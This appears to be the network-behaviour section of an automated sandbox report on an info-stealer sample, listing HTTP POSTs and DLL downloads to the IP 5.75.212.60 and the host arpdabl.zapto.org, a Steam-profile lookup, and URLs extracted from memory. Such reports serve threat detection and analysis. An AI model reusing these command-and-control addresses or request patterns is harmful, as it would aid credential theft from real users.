                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 465Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 130941Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGIDGCGIEGDGDGDGHJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: arpdabl.zapto.orgContent-Length: 3257Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FBD5B3 InternetReadFile,SetEvent,GetLastError,SetEvent,11_2_00FBD5B3
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: BOAbiVqkIfMQExjauBCLW.BOAbiVqkIfMQExjauBCLW
                    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                    Source: global trafficDNS traffic detected: DNS query: arpdabl.zapto.org
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                    Source: Buyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.DAKFIDGIDB
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.GIDB
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/z
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.orgB
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zaptoDGIDB
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                    Source: file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                    Source: file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                    Source: file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                    Source: file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: file.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                    Source: file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                    Source: file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: file.exe, 00000000.00000003.1998402768.000000000295A000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp, Desire.0.dr, Buyer.pif.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561231245.000000006C44D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: Buyer.pif, 0000000B.00000002.2541751260.000000000C8ED000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://5.75.212.60
                    Source: Buyer.pif, 0000000B.00000002.2537111059.00000000039F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/
                    Source: Buyer.pif, 0000000B.00000002.2537111059.00000000039F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/H
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/freebl3.dll
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/freebl3.dlln
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/mozglue.dll
                    Source: Buyer.pif, 0000000B.00000002.2537111059.00000000039F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/msvcp140.dll
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/nss3.dll
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/nss3.dll=
                    Source: Buyer.pif, 0000000B.00000002.2537111059.00000000039F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/softokn3.dll
                    Source: Buyer.pif, 0000000B.00000002.2537111059.00000000039F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/softokn3.dlli
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/sqls.dll
                    Source: Buyer.pif, 0000000B.00000002.2537111059.00000000039F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/vcruntime140.dll
